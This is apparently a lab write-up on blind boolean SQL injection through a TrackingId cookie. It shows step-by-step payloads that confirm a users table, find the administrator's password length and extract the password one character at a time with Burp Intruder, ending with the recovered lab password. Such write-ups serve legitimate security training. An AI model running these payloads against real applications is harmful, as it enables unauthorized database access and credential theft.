Cookie: TrackingId=tJ1ux5PVRUX2vGYM ' and 1=1 -
When using above payload Welcome back! message is displayed.
Cookie: TrackingId=tJ1ux5PVRUX2vGYM ' and 1=2 --
When using above payload Welcome back! is not displayed.
The applications is responding differently depending on the True and false query we sent. Now we can use this response to take out the password from users table. Before that
Cookie: TrackingId=tJ1ux5PVRUX2vGYM ' and (select 'x' from users ) = 'x' --
This payload checks if the users table exist or not. Since Welcome back! message is displayed , we can confirm users table exist.
Cookie: TrackingId=tJ1ux5PVRUX2vGYM ' and (select username from
users where username = 'administrator') = 'administrator' --
This payload return True if user administrator exist in users table and return false if administrator user does not exit in users table. Since the administrator user exist, query return true and hence Welcome back! message is displayed.
Since we know the administrator user exist in the table. We can procced to finding the length of password so that it will be easier to brute force the password later.
Cookie: TrackingId=tJ1ux5PVRUX2vGYM ' and (select length(password)
from users where username = 'administrator')>0 --
In above query (select length(password)
part return True since password is greater than Zero . And hence Welcome Back! message is displayed.
from users where username = ‘administrator’)>0
Application will not return Welcome Back! message if the query returns false. For example: if the password length 8 and the query is (select length(password) from users where username = ‘administrator’)>10
then it would return False and Welcome back! message will not be displayed.
It is tiring to manually change the length digit and view change in application response. So we will be using Intruder feature from BurpSuite.
Ctrl + I to send the request to intruder.
0
Sniper
On Payloads
section
Here we can see difference in length. In response of length 5437 we can see the Welcome back! message.
Here we cannot see difference in length. In response of length 5437 we can see the Welcome back! message.
We can clearly see the response length for payload 0–19 is 5473 which contains the welcome back! message.
But Response length for payload greater than 20 is 5412 doesnot contains the welcome back! message.
Therefore length of password = 20
Note: Response length may vary in your case. Focus on the response message for respective response length.
Now its time to get the password.
In intruder edit the payload as
Cookie: TrackingId=tJ1ux5PVRUX2vGYM ' and (select substring(password ,1,1)
from users where username = 'administrator')= 'a' --
dollarboysushil
the substring(password,1,1) gives d
(select substring(password ,1,1) from users where username = ‘administrator’)
will return first character of string , if the character = ‘a’ then the query will be true. thus the response will consist Welcome back! message.In Intruder:
Select starting field of substring function , comparing value and click on add.
Select Attack Type as : Cluster Bomb
In Payloads section
- Payload set 1 (this is the payload for the start field of substring field)
- Payload type : Numbers
- Payload setting , From : 0
- Payload setting , From : 20 (which is the length of password)
- Payload setting , Steps : 1
Now edit the payload Set 2 (this is the payload for the characters we are comparing)
- Select payload type : Brute forcer
- Select min length: 1
- Select Max length: 1
Then start the attack
There are two response length. One response contains Welcome back!
response. In my case 5473 contains the welcome back message. Sort the length and rearrange the password.
In my case Password = baw6dlog9hpv7tfxus9l
My social medial handle
Instagram dollarboysushil
Twitter (X) dollarboysushil
Youtube dollarboysushil
This writeup is purely inspired/helped by Rana Khalil. Check her youtube video here.